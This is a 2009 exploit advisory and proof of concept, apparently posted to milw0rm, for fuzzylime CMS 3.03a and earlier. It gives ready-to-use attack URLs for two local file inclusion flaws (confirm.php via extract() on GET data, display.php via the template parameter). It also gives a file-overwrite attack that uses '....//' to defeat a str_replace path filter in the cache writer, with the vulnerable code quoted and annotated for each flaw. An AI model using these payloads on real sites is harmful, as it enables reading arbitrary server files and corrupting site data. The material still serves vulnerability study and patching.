
+------------------------------------------------------------------------+
| fuzzylime cms <= 3.03a local inclusion / arbitrary file corruption poc |
+-----------+------------------------------------------------------------+
| by staker |
+-----------+---------------------+
| mail: staker[at]hotmail[dot]it |
| url: http://cms.fuzzylime.co.uk |
+---------------------------------+
|
|
|
|
|
|
[1][LFI]
|
|
|
|
http://[target]/[path]/code/confirm.php?e[]&list= { file + nullbyte }
|
|
|
|
Vulnerable code: confirm.php (local file inclusion, magic_quotes off)
|
|
-----------------------------------------------------------------
|
|
1. <?
|
|
2. @extract($HTTP_GET_VARS); <-------- {1}
|
|
3. @extract($_GET); <----------^
|
|
|
|
27. elseif(isset($e)) { <------- {2}
|
|
28. $filename = "code/mailing/$list.inc.php"; <------- {3}
|
|
29. @include $filename; <------- {4}
|
|
-----------------------------------------------------------------
|
|
1. extract() allows any variable that is not already defined to be set via GET,
|
|
so this works regardless of the register_globals setting.
|
|
|
|
2. $e is not defined beforehand, therefore it becomes $_GET['e']
|
|
3. $list is not defined beforehand, therefore it becomes $_GET['list']
|
|
4. $filename is built from the $list variable and is then included (line 29)
|
|
-----------------------------------------------------------------
|
|
|
|
|
|
[2][LFI]
|
|
|
|
http://[target]/[path]/code/display.php?template= {file + nullbyte}
|
|
|
|
Vulnerable code: display.php (local file inclusion, magic_quotes off & register_globals on)
|
|
--------------------------------------------------------------------
|
|
98. if($_GET['print'] != "1") include "templates/${template}_f.php";
|
|
--------------------------------------------------------------------
|
|
|
|
|
|
|
|
|
|
[3][LFC]
|
|
|
|
http://[target]/[path]/code/display.php?usecache=1&s=....//settings
|
|
http://[target]/[path]/code/display.php?usecache=1&s={file + nullbyte}(mq = off)
|
|
|
|
Vulnerable code: display.php (local file corruption, register_globals on)
|
|
-----------------------------------------------------------------
|
|
1. <?
|
|
2. $s = $_GET[s];
|
|
3. $p = $_GET[p];
|
|
4. $s = str_replace("../", "", $s); <---------- {1}
|
|
5. $p = str_replace("../", "", $p);
|
|
...
|
|
54. $cachefile = "cache/${s}_${p}_$_GET[m]_$_GET[c]_$_GET[t]_$_GET[u]_$_GET[print].cache.htm"; <---- {2}
|
|
100. if($usecache == "1" && $passprot != "1" && $s != "rss" && empty($_GET[msg]) && empty($_GET[tn])) { <--- {3}
|
|
101. if($handle = fopen($cachefile, 'w')) { // Create the cache file <-------- {4}
|
|
102. $output = ob_get_contents();
|
|
103. fputs($handle, $output);
|
|
104.
|
|
105. fclose($handle);
|
|
106. }
|
|
107. }
|
|
----------------------------------------------------------------------
|
|
1. Because of the str_replace at point 1, ....// has to be used to change directory, so
|
|
....// becomes ../ once the replacement has run.
|
|
2. $cachefile is built from the $s variable
|
|
3. if $usecache == 1 the cache-writing branch is reached
|
|
4. the file whose name is supplied via the $s variable is overwritten.
|
|
-----------------------------------------------------------------------
|
|
|
|
[x] http://www.youtube.com/watch?v=h3DQmJOkSY0
|
|
|
|
# milw0rm.com [2009-06-17]
|